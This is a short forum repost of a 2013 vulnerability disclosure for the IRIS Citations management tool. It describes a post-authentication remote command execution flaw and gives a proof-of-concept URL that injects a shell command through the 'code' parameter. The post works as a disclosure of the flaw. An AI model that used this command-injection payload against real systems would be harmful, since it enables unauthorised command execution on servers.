Jump to content
Praetorian503

IRIS Citations Management Tool Command Execution

Recommended Posts

Posted

IRIS Citations management tool suffers from a remote command execution vulnerability.

A vulnerability exists in IRIS citations management tool which allows a low privileged attacker to execute arbitrary commands.

Details can be found on my blog:
https://infosecabsurdity.wordpress.com/2013/02/09/iris-citations-management-tool-post-auth-remote-command-execution/

PoC:

http://[target]/[path]/index.php?p=add&import=spnro&code=a"+-T+0.1+||echo+`id`+>+/tmp/luls||"

~ aeon

Source: PacketStorm

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...